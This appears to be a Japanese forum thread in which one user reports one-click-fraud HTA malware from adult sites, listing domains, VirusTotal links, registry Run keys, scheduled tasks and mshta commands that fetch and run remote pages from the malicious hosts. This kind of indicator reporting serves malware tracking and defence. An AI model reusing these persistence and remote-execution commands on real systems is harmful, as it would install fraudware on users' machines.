http://www.virustotal.com/file-scan/report.html?id=f4b1b53ed6c07a337d65d1c9abde3b967bd5c34274a75ef95637d8567c79616c-1326370534 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2] C:\Users\Cerberus\AppData\Roaming\Identities\odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2.vbs Startup on Registory HKCU:Run odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2 C:\Users\Cerberus\AppData\Roaming\Identities\odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Identities\odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2.vbs</Command> エッチ動画 - いぬ 2012/01/08(Sun) 19:48 No.22732 ワンクリウェア入り http://bowl.plumbumhost.net/ http://plumbumhost.net/ http://*.plumbumhost.net/ File name 「sexspece_1325978830.hta」 http://www.virustotal.com/file-scan/report.html?id=6cd1f05aac2aa7d9cf8857d2deb575c00f8de91d2657570d6d81773541671152-1325978466 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [adventure_7eb37268e2f4876a59fe3c6c7aafc364b81e762a0adcb391] C:\Users\Cerberus\AppData\Roaming\Microsoft\adventure_7eb37268e2f4876a59fe3c6c7aafc364b81e762a0adcb391.vbs Startup on Registory HKCU:Run adventure_7eb37268e2f4876a59fe3c6c7aafc364b81e762a0adcb391 C:\Users\Cerberus\AppData\Roaming\Microsoft\adventure_7eb37268e2f4876a59fe3c6c7aafc364b81e762a0adcb391.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Microsoft\adventure_7eb37268e2f4876a59fe3c6c7aafc364b81e762a0adcb391.vbs</Command> ----------------------------------------------------------- http://citizen.titaniumnubiles.net/ http://titaniumnubiles.net/ http://*.titaniumnubiles.net/ File name 「onadaisukikko_1326368560.hta」 http://www.virustotal.com/file-scan/report.html?id=e2d4da2c0f2dd43357429f1706a40714ba8bd7e2d0cb8c7d4be4004532832782-1326368198 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [bibeko_99f95096f70c2452aae3ece2d84b7689ba0ba83cc9d38915] C:\Users\Cerberus\AppData\Roaming\Media Center Programs\bibeko_99f95096f70c2452aae3ece2d84b7689ba0ba83cc9d38915.vbs Startup on Registory HKCU:Run bibeko_99f95096f70c2452aae3ece2d84b7689ba0ba83cc9d38915 C:\Users\Cerberus\AppData\Roaming\Media Center Programs\bibeko_99f95096f70c2452aae3ece2d84b7689ba0ba83cc9d38915.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Media</Command> <Arguments>Center Programs\bibeko_99f95096f70c2452aae3ece2d84b7689ba0ba83cc9d38915.vbs</Arguments> JPPorn - いぬ 2012/01/08(Sun) 19:50 No.22733 ワンクリウェア入り http://molest-porn.info/ File name 「MovieID_fGRY2QhPi1Ggrt8M2ZZu4toDMoiuWJup.hta」 http://www.virustotal.com/file-scan/report.html?id=8ae461fe6b20da2f875ca0b29d583b6b109933a0a7272e260151a4a87793d8ba-1325995274 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootfGRY2QhPi1Ggrt8M2ZZu4toDMoiuWJup] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWritefGRY2QhPi1Ggrt8M2ZZu4toDMoiuWJup] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://molest-porn.info/set_inf2.php?cccid=fGRY2QhPi1Ggrt8M2ZZu4toDMoiuWJup The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://molest-porn.info/reg2.php?cccid=fGRY2QhPi1Ggrt8M2ZZu4toDMoiuWJup Startup on Registory HKCU:Run RegWritefGRY2QhPi1Ggrt8M2ZZu4toDMoiuWJup C:\Users\Cerberus\SoftRecovery\RegWrite.lnk SystemBootfGRY2QhPi1Ggrt8M2ZZu4toDMoiuWJup C:\Users\Cerberus\UserProfile\SystemBoot.lnk RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library　 <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://molest-porn.info/set_inf2.php?cccid=fGRY2QhPi1Ggrt8M2ZZu4toDMoiuWJup</Arguments> --------------------------------------------------------- http://janet-porn.info/ File name 「MovieID_ztfw12sDDmA8d3LpSv1tLAoI4KdbCQL9.hta」 http://www.virustotal.com/file-scan/report.html?id=4cecb42e33d4aaa892f3cc9f5a243b3605bf002d49b5de64fb3a337229cd475f-1326196720 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootztfw12sDDmA8d3LpSv1tLAoI4KdbCQL9] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteztfw12sDDmA8d3LpSv1tLAoI4KdbCQL9] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://janet-porn.info/set_inf2.php?cccid=ztfw12sDDmA8d3LpSv1tLAoI4KdbCQL9 The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://janet-porn.info/reg2.php?cccid=ztfw12sDDmA8d3LpSv1tLAoI4KdbCQL9 Startup on Registory HKCU:Run RegWriteztfw12sDDmA8d3LpSv1tLAoI4KdbCQL9 C:\Users\Cerberus\SoftRecovery\RegWrite.lnk HKCU:Run SystemBootztfw12sDDmA8d3LpSv1tLAoI4KdbCQL9 C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library　 <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://janet-porn.info/set_inf2.php?cccid=ztfw12sDDmA8d3LpSv1tLAoI4KdbCQL9</Arguments> Japanese Movies - いぬ 2012/01/08(Sun) 19:52 No.22734 ワンクリウェア入り http://gn568rg.info/ File name 「MovieID_4lu8g1MR2e0NX6H6tkZ5v48jxb2avME6.hta」 http://www.virustotal.com/file-scan/report.html?id=e7f5e6c22cbad692279289f05b2605de33a3045c6d31e843d61475a4d1fbac15-1326008391 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBoot4lu8g1MR2e0NX6H6tkZ5v48jxb2avME6] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWrite4lu8g1MR2e0NX6H6tkZ5v48jxb2avME6] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://gn568rg.info/set_inf2.php?cccid=4lu8g1MR2e0NX6H6tkZ5v48jxb2avME6 The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://gn568rg.info/reg2.php?cccid=4lu8g1MR2e0NX6H6tkZ5v48jxb2avME6 Startup on Registory HKCU:Run RegWrite4lu8g1MR2e0NX6H6tkZ5v48jxb2avME6 C:\Users\Cerberus\SoftRecovery\RegWrite.lnk HKCU:Run SystemBoot4lu8g1MR2e0NX6H6tkZ5v48jxb2avME6 C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library　 <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://gn568rg.info/set_inf2.php?cccid=4lu8g1MR2e0NX6H6tkZ5v48jxb2avME6</Arguments> ---------------------------------------------------------- http://knie51k.info/ File name 「MovieID_iGcp0HwhSneZ1CIbbO3rMr6JomUXw31B.hta」 http://www.virustotal.com/file-scan/report.html?id=481744a51400f76884422c6e48f21cb6e38f0e961f97e115821bfb17bacb1fdd-1326193814 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootiGcp0HwhSneZ1CIbbO3rMr6JomUXw31B] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteiGcp0HwhSneZ1CIbbO3rMr6JomUXw31B] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://knie51k.info/set_inf2.php?cccid=iGcp0HwhSneZ1CIbbO3rMr6JomUXw31B The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://knie51k.info/reg2.php?cccid=iGcp0HwhSneZ1CIbbO3rMr6JomUXw31B Startup on Registory HKCU:Run RegWriteiGcp0HwhSneZ1CIbbO3rMr6JomUXw31B C:\Users\Cerberus\SoftRecovery\RegWrite.lnk HKCU:Run SystemBootiGcp0HwhSneZ1CIbbO3rMr6JomUXw31B C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library　 <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://knie51k.info/set_inf2.php?cccid=iGcp0HwhSneZ1CIbbO3rMr6JomUXw31B</Arguments> ---------------------------------------------------------- http://rink74r.info/ File name 「MovieID_aPCIq1FUhJrNM4OItQrfwMUF1wLVlgMd.hta」 https://www.virustotal.com/file/cf1e5932376683730633ad9ef2aaa6f8de3ce9609d83812d4743f41fb092cc71/analysis/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [RegWriteaPCIq1FUhJrNM4OItQrfwMUF1wLVlgMd] C:\Users\Cerberus\SoftRecovery\dataPCIq1FUhJrNM4OItQrfwMUF1wLVlgMd.bat O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://rink74r.info//set_inf2.php?cccid=aPCIq1FUhJrNM4OItQrfwMUF1wLVlgMd The link place of "SystemBoot" C:\Users\Cerberus\UserProfile\htmlapp.exe http://rink74r.info//reg2.php?cccid=aPCIq1FUhJrNM4OItQrfwMUF1wLVlgMd Startup on Registory HKCU:Run RegWriteaPCIq1FUhJrNM4OItQrfwMUF1wLVlgMd C:\Users\Cerberus\SoftRecovery\dataPCIq1FUhJrNM4OItQrfwMUF1wLVlgMd.bat Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library　 RegWrite <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://rink74r.info//set_inf2.php?cccid=aPCIq1FUhJrNM4OItQrfwMUF1wLVlgMd</Arguments> SystemBoot <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://rink74r.info//reg2.php?cccid=aPCIq1FUhJrNM4OItQrfwMUF1wLVlgMd</Arguments> アダルト見放題 - いぬ 2012/01/08(Sun) 21:50 No.22735 ワンクリウェア入り http://reptiles.mountainlilac.net/ http://mountainlilac.net/ http://*.mountainlilac.net/ File name 「onahoudai_1326025112.hta」 http://www.virustotal.com/file-scan/report.html?id=8153cba278b0cc21add487eba3d876e72976eaaf6428ca537d6f7c2c6cd28c36-1326024745 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [playview_2b93e9401b17f5d914338e34b9f16a90703708b21e5f0d86] C:\Users\Cerberus\AppData\Roaming\Media Center Programs\playview_2b93e9401b17f5d914338e34b9f16a90703708b21e5f0d86.vbs Startup on Registory HKCU:Run playview_2b93e9401b17f5d914338e34b9f16a90703708b21e5f0d86 C:\Users\Cerberus\AppData\Roaming\Media Center Programs\playview_2b93e9401b17f5d914338e34b9f16a90703708b21e5f0d86.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Media</Command> <Arguments>Center Programs\playview_2b93e9401b17f5d914338e34b9f16a90703708b21e5f0d86.vbs</Arguments> アダルトムービー - いぬ 2012/01/08(Sun) 21:53 No.22736 ワンクリウェア入り http://mantis.mervcondor.net/ http://mervcondor.net/ http://*.mervcondor.net/ File name 「lobemote_1326024060.hta」 http://www.virustotal.com/file-scan/report.html?id=e1d4a7930d7e4268b865d2301de522cd788b9e61ec3db4c8e4fdbd0a3ba07a2e-1326023637 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [mekakusi_838c32d061e6d6df00e0276e139029141170df5278dbf8b3] C:\Users\Cerberus\AppData\Roaming\Media Center Programs\mekakusi_838c32d061e6d6df00e0276e139029141170df5278dbf8b3.vbs Startup on Registory HKCU:Run mekakusi_838c32d061e6d6df00e0276e139029141170df5278dbf8b3 C:\Users\Cerberus\AppData\Roaming\Media Center Programs\mekakusi_838c32d061e6d6df00e0276e139029141170df5278dbf8b3.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Media</Command> <Arguments>Center Programs\mekakusi_838c32d061e6d6df00e0276e139029141170df5278dbf8b3.vbs</Arguments> -------------------------------------------------------- http://mudskipper.memphisjackal.net/ http://memphisjackal.net/ http://*.memphisjackal.net/ File name 「yanyanyan_1326453601.hta」 https://www.virustotal.com/file/15104d3423cff2222345d9f23d0a5cb21585c0a721eba2ef32ce6f26ac1b0f5d/analysis/1326453619/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [wzskip_329c714ac98a0a3dc1381c2ea58206a0b0f3b34195cb5465] C:\Users\Cerberus\AppData\Roaming\Macromedia\wzskip_329c714ac98a0a3dc1381c2ea58206a0b0f3b34195cb5465.vbs Startup on Registory HKCU:Run wzskip_329c714ac98a0a3dc1381c2ea58206a0b0f3b34195cb5465 C:\Users\Cerberus\AppData\Roaming\Macromedia\wzskip_329c714ac98a0a3dc1381c2ea58206a0b0f3b34195cb5465.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Macromedia\wzskip_329c714ac98a0a3dc1381c2ea58206a0b0f3b34195cb5465.vbs</Command> Sexraifu.Info - いぬ 2012/01/09(Mon) 14:02 No.22737 ワンクリウェア入り File name 「MobileMovie.hta」 http://www.virustotal.com/file-scan/report.html?id=e1496efa84ed784ddf66d398693e79f1a417d2f0fb29d00a93db03863cc8c715-1326079636 C:\Users\Cerberus\AppData\Roaming\Media Center Programs\WscMgr.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [papm Czttle] "C:\Users\Cerberus\AppData\Roaming\Macromedia\Czttle.lnk" O4 - HKCU\..\Run: [jhm8789_795389203] "C:\Windows\system32\mshta" http://9293.erofaita.info/p23/tPnj81zTJ0te8vERICmrvA.htm The link place of "Czttle" "C:\Users\Cerberus\AppData\Roaming\Media Center Programs\WscMgr.exe" //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Macromedia\kindsbv.cnf" Startup on Registory HKCU:Run jhm8789_795389203 "C:\Windows\system32\mshta" http://9293.erofaita.info/p23/tPnj81zTJ0te8vERICmrvA.htm HKCU:Run papm Czttle "C:\Users\Cerberus\AppData\Roaming\Macromedia\Czttle.lnk" アダルト館 - いぬ 2012/01/09(Mon) 14:04 No.22738 ワンクリウェア入り http://theater-zoom.com/ File name 「movie_1326078009.hta」 http://www.virustotal.com/file-scan/report.html?id=7a7eb0ce639634b584c27bcdb0c950a37c456a987675698183660703e1aff347-1326077629 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [system_boot_6724c0cc8e8d115445f558532836870a] C:\Windows\system32\mshta http://theater-zoom.com/reg2.php?cid=6724c0cc8e8d115445f558532836870a Startup on Registory HKCU:Run system_boot_6724c0cc8e8d115445f558532836870a C:\Windows\system32\mshta http://theater-zoom.com/reg2.php?cid=6724c0cc8e8d115445f558532836870a エロサイト - いぬ 2012/01/10(Tue) 22:10 No.22740 ワンクリウェア入り http://dancer.twistrocktune.net/ http://twistrocktune.net/ http://*.twistrocktune.net/ File name 「lovelife_1326184914.hta 」 http://www.virustotal.com/file-scan/report.html?id=7aba615f744a00b5e400a2afa99f0b66ec9409386b15b93e2574856fc0a178f1-1326184550 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [cammy_130f570f23e12c9c66b4fe8a93b30555b3b187d1a055fd22] C:\Users\Cerberus\AppData\Roaming\Identities\cammy_130f570f23e12c9c66b4fe8a93b30555b3b187d1a055fd22.vbs Startup on Registory HKCU:Run cammy_130f570f23e12c9c66b4fe8a93b30555b3b187d1a055fd22 C:\Users\Cerberus\AppData\Roaming\Identities\cammy_130f570f23e12c9c66b4fe8a93b30555b3b187d1a055fd22.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Identities\cammy_130f570f23e12c9c66b4fe8a93b30555b3b187d1a055fd22.vbs</Command> Adult site - いぬ 2012/01/10(Tue) 22:12 No.22741 ワンクリウェア入り http://politics.monkeydedge.net/ http://monkeydedge.net/ http://*.monkeydedge.net/ File name 「analboy_1326186040.hta」 http://www.virustotal.com/file-scan/report.html?id=580c976b2b17658c70514c9e49ed558369f33abd4453073bad49ba2e4a3af88d-1326185674 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [onabit_aafe033f0e3f615eda3fb753310a73dabb7f8241bec3e412] C:\Users\Cerberus\AppData\Roaming\Adobe\onabit_aafe033f0e3f615eda3fb753310a73dabb7f8241bec3e412.vbs Startup on Registory HKCU:Run onabit_aafe033f0e3f615eda3fb753310a73dabb7f8241bec3e412 C:\Users\Cerberus\AppData\Roaming\Adobe\onabit_aafe033f0e3f615eda3fb753310a73dabb7f8241bec3e412.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Adobe\onabit_aafe033f0e3f615eda3fb753310a73dabb7f8241bec3e412.vbs</Command> --------------------------------------------------------- http://enter.eromostlegend.net/ http://eromostlegend.net/ http://*enter.eromostlegend.net/ File name 「videonudegirl_1326369672.hta」 http://www.virustotal.com/file-scan/report.html?id=3cc2180ec1b12704a7ed1e4837399844d123075b503267b8dc30225dfff9c01a-1326369308 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [shampoooo_541b5bfe6187e0114d1f8d5a8fa81d90b2d93769f0105bb9] C:\Users\Cerberus\AppData\Roaming\Media Center Programs\shampoooo_541b5bfe6187e0114d1f8d5a8fa81d90b2d93769f0105bb9.vbs Startup on Registory HKCU:Run shampoooo_541b5bfe6187e0114d1f8d5a8fa81d90b2d93769f0105bb9 C:\Users\Cerberus\AppData\Roaming\Media Center Programs\shampoooo_541b5bfe6187e0114d1f8d5a8fa81d90b2d93769f0105bb9.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Media</Command> <Arguments>Center Programs\shampoooo_541b5bfe6187e0114d1f8d5a8fa81d90b2d93769f0105bb9.vbs</Arguments> Avstyle - いぬ 2012/01/10(Tue) 22:21 No.22742 ワンクリウェア入り http://sauteed.adulluffy.net/ http://adulluffy.net/ http://*.adulluffy.net/ File name 「hamehameha_1326195944.hta」 http://www.virustotal.com/file-scan/report.html?id=f631b518dacd786bad57e451c7efc853e2f87e85f17626b637a370b53a89d985-1326195526 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [kingbrige_32b32078f2b99e755d6d0c732b831f3d112ce5ed736b33fa] C:\Users\Cerberus\AppData\Roaming\Macromedia\kingbrige_32b32078f2b99e755d6d0c732b831f3d112ce5ed736b33fa.vbs Startup on Registory HKCU:Run kingbrige_32b32078f2b99e755d6d0c732b831f3d112ce5ed736b33fa C:\Users\Cerberus\AppData\Roaming\Macromedia\kingbrige_32b32078f2b99e755d6d0c732b831f3d112ce5ed736b33fa.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Macromedia\kingbrige_32b32078f2b99e755d6d0c732b831f3d112ce5ed736b33fa.vbs</Command> -------------------------------------------------------- http://cinnamon.pappagoo.net/ http://pappagoo.net/ http://*.pappagoo.net/ File name 「candydolls_1326367393.hta」 Kaspersky 9.0.0.837 2012.01.12 Trojan-Downloader.HTA.Agent.bu http://www.virustotal.com/file-scan/report.html?id=41af830bd502f839a2c3681fdf3def40da2a7af024e5731573bb57bbaffccb37-1326366979 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [jumphiphop_1a6975bfd3c5b7d08f3cbe79b71f50ecda0d956c94273bdd] C:\Users\Cerberus\AppData\Roaming\Macromedia\jumphiphop_1a6975bfd3c5b7d08f3cbe79b71f50ecda0d956c94273bdd.vbs Startup on Registory HKCU:Run jumphiphop_1a6975bfd3c5b7d08f3cbe79b71f50ecda0d956c94273bdd C:\Users\Cerberus\AppData\Roaming\Macromedia\jumphiphop_1a6975bfd3c5b7d08f3cbe79b71f50ecda0d956c94273bdd.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Macromedia\jumphiphop_1a6975bfd3c5b7d08f3cbe79b71f50ecda0d956c94273bdd.vbs</Command> ADULT - いぬ 2012/01/12(Thu) 22:33 No.22744 ワンクリウェア入り http://www.rattlesnake-movies.com/ File name 「5987.hta」 http://www.virustotal.com/file-scan/report.html?id=d0a208250059b6ea31a81e110b97f34bddf05f01ad0655e20bdd4d598eeeeb06-1326356540 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.high-quality-movie.com] mshta http://www.rattlesnake-movies.com/regist2.php Startup on Registory HKCU:Run www.high-quality-movie.com mshta http://www.rattlesnake-movies.com/regist2.php エロサイト - いぬ 2012/01/12(Thu) 22:49 No.22745 ワンクリウェア入り http://programmer.puttipantti.net/ http://puttipantti.net/ http://*.puttipantti.net/ File name 「playroomvideo_1326372174.hta」 http://r.virscan.org/report/f0be73269a345179e8ff04f58b388cf3.html C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [sorarion_26244059c3191d0e0ddc0c1e28d50e36e054d71763c8d551] C:\Users\Cerberus\AppData\Roaming\Macromedia\sorarion_26244059c3191d0e0ddc0c1e28d50e36e054d71763c8d551.vbs Startup on Registory HKCU:Run sorarion_26244059c3191d0e0ddc0c1e28d50e36e054d71763c8d551 C:\Users\Cerberus\AppData\Roaming\Macromedia\sorarion_26244059c3191d0e0ddc0c1e28d50e36e054d71763c8d551.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Macromedia\sorarion_26244059c3191d0e0ddc0c1e28d50e36e054d71763c8d551.vbs</Command> アダルト見放題 - いぬ 2012/01/13(Fri) 22:22 No.22746 ワンクリウェア入り http://cirrhosis.oregonrainclover.net/ http://oregonrainclover.net/ http://*.oregonrainclover.net/ File name 「gspoty_1326452251.hta」 https://www.virustotal.com/file/506aba210bdda1341881fdc45fa346a902bac2da4391a7dd5ee55a56f241a3b3/analysis/1326452267/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [lovemelody_9f3b238966cc388c459c6f77e0f849ca6f7fc68b3f04eeac] C:\Users\Cerberus\AppData\Roaming\Media Center Programs\lovemelody_9f3b238966cc388c459c6f77e0f849ca6f7fc68b3f04eeac.vbs Startup on Registory KCU:Run lovemelody_9f3b238966cc388c459c6f77e0f849ca6f7fc68b3f04eeac C:\Users\Cerberus\AppData\Roaming\Media Center Programs\lovemelody_9f3b238966cc388c459c6f77e0f849ca6f7fc68b3f04eeac.vbs Task Scheduler library　 <Command>C:\Users\Cerberus\AppData\Roaming\Media</Command> <Arguments>Center Programs\lovemelody_9f3b238966cc388c459c6f77e0f849ca6f7fc68b3f04eeac.vbs</Arguments> ADULT COLLECTION - いぬ 2012/01/13(Fri) 22:27 No.22747 ワンクリウェア入り http://www.call-waiting.org/ File name 「75ee.hta」 https://www.virustotal.com/file/023c46c1c287fe819874c3da78c294f230fce6de8f1a58d212fc0fe0d58eedee/analysis/1326454782/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta http://www.call-waiting.org/regist2.php Startup on Registory HKCU:Run www.adult-collection09.net mshta http://www.call-waiting.org/regist2.php ADULT DREAM - いぬ 2012/01/13(Fri) 22:29 No.22748 ワンクリウェア入り http://www.holmes-channel.org/ File name 「74ab.hta」 Kaspersky Trojan-Downloader.HTA.Agent.bu 9.0.0.837 20120113 C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-dream.net] mshta http://www.holmes-channel.org/regist2.php Startup on Registory HKCU:Run www.adult-dream.net mshta http://www.holmes-channel.org/regist2.php エロチック館 - いぬ 2012/01/14(Sat) 21:26 No.22749 ワンクリウェア入り http://e53.love-more.net/ http://*.love-more.net/ File name 「LoadMovie.hta」 https://www.virustotal.com/file/c02c945f569dc09cd925b86be7728d712f291fd2de6ed4c59dcaedc5fda2f840/analysis/1326536974/ C:\Users\Cerberus\AppData\Roaming\Adobe\TosMsgAgt.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [Uendezvouswntel] "C:\Users\Cerberus\AppData\Roaming\Identities\wntel.lnk" O4 - HKCU\..\Run: [RTOP62715_625947903] "C:\Windows\system32\mshta" http://e0af.love-more.net/slnffll/U9BuQq~eMep05~HMucC3~Q.htm The link place of "wntel" C:\Users\Cerberus\AppData\Roaming\Adobe\TosMsgAgt.exe //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Adobe\ZigBee134Ikl" Startup on Registory HKCU:Run RTOP62715_625947903 "C:\Windows\system32\mshta" http://e0af.love-more.net/slnffll/U9BuQq~eMep05~HMucC3~Q.htm HKCU:Run Uendezvouswntel "C:\Users\Cerberus\AppData\Roaming\Identities\wntel.lnk" Adult.Movie-Aconite - いぬ 2012/01/14(Sat) 21:28 No.22750 ワンクリウェア入り http://hibiscus-movie.com/ File name 「movie_l1326541124.hta」 Kaspersky HEUR:Trojan.Script.Generic 9.0.0.837 20120106 https://www.virustotal.com/file/1c2b14dfaa5b322d92c90ed53fd9d075c678ef9d27ce6b252a39466caddf6968/analysis/ C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [heptalia] C:\WINDOWS\system32\mshta.exe "C:\Documents and Settings\Cerberus\Application Data\heptalia\heptalia.hta" Startup on Registory HKCU:Run heptalia C:\WINDOWS\system32\mshta.exe "C:\Documents and Settings\Cerberus\Application Data\heptalia\heptalia.hta" JPPorn - いぬ 2012/01/15(Sun) 20:19 No.22751 ワンクリウェア入り http://grope-porn.info/ http://miyuki-porn.info/ http://fuck-porn.info/ File name 「MovieID_AFTA5jStJtXVyIccYBs8H9XJ9YrxIL6P.hta」 https://www.virustotal.com/file/0868c2bd83af84fd452fe625cbe6f328a533e3433c438cbc82902b244f5bb617/analysis/1326594069/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootAFTA5jStJtXVyIccYBs8H9XJ9YrxIL6P] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteAFTA5jStJtXVyIccYBs8H9XJ9YrxIL6P] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe The link place of "RegWrite" C:\Windows\System32\mshta.exe http://fuck-porn.info/set_inf2.php?cccid=AFTA5jStJtXVyIccYBs8H9XJ9YrxIL6P The link place of "RegWrite" C:\Windows\System32\mshta.exe http://fuck-porn.info/set_inf2.php?cccid=AFTA5jStJtXVyIccYBs8H9XJ9YrxIL6P Startup on Registory HKCU:Run RegWriteAFTA5jStJtXVyIccYBs8H9XJ9YrxIL6P C:\Users\Cerberus\SoftRecovery\RegWrite.lnk HKCU:Run SystemBootAFTA5jStJtXVyIccYBs8H9XJ9YrxIL6P C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe Task Scheduler library　 <Command>C:\Windows\system32\mshta.exe</Command> <Arguments>http://fuck-porn.info/set_inf2.php?cccid=AFTA5jStJtXVyIccYBs8H9XJ9YrxIL6P</Arguments> アダルトサイト - いぬ 2012/01/15(Sun) 20:21 No.22752 ワンクリウェア入り http://gjb.coolfast.biz/ http://dfh.coolfast.biz/ http://*.coolfast.biz/ File name 「MoviePlayer.hta」 https://www.virustotal.com/file/6b9658116bf178e3b2d776fac8d15ebdab8d991115f2b6ca9f1264279edeec7e/analysis/1326616813/ C:\Users\Cerberus\AppData\Roaming\Adobe\vvinMgr.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [VireWireRozilla] "C:\Users\Cerberus\AppData\Roaming\Media Center Programs\Rozilla.lnk" O4 - HKCU\..\Run: [uranvs44879_740554405] "C:\Windows\system32\mshta" http://678b.coolfast.biz/py/3LEcPGI0otr-hD4fSnY09w.htm The link place of "Rozilla" C:\Users\Cerberus\AppData\Roaming\Adobe\vvinMgr.exe //B //E:VBScript.Encode "C:\Users\Cerberus\AppData\Roaming\Media Center Programs\ScoleciteUjWD.dat" Startup on Registory HKCU:Run uranvs44879_740554405 "C:\Windows\system32\mshta" http://678b.coolfast.biz/py/3LEcPGI0otr-hD4fSnY09w.htm HKCU:Run VireWireRozilla "C:\Users\Cerberus\AppData\Roaming\Media Center Programs\Rozilla.lnk" EROSTAR - いぬ 2012/01/15(Sun) 20:25 No.22753 ワンクリウェア入り http://wniw5w.info/ File name 「MovieID_ghA6foTg8PotRxzPQ7wRo56ManjsMwyu.hta」 https://www.virustotal.com/file/e7e91b76c18115b941bc257f64ec8605c245ee7b42b53d98aad244de0ff753b6/analysis/1326622236/ C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBoot730fs73gxlxsLD6GZpsXLlvlZDuQSUjZ] C:\Users\Cerberus\UserProfile\SystemFile.lnk O4 - HKCU\..\Run: [RegWrite730fs73gxlxsLD6GZpsXLlvlZDuQSUjZ] C:\Users\Cerberus\SoftRecovery\dat730fs73gxlxsLD6GZpsXLlvlZDuQSUjZ.cmd O4 - Startup: RegWriting.lnk = C:\Windows\System32\mshta.exe The link place of "RegWriting" C:\Windows\System32\mshta.exe 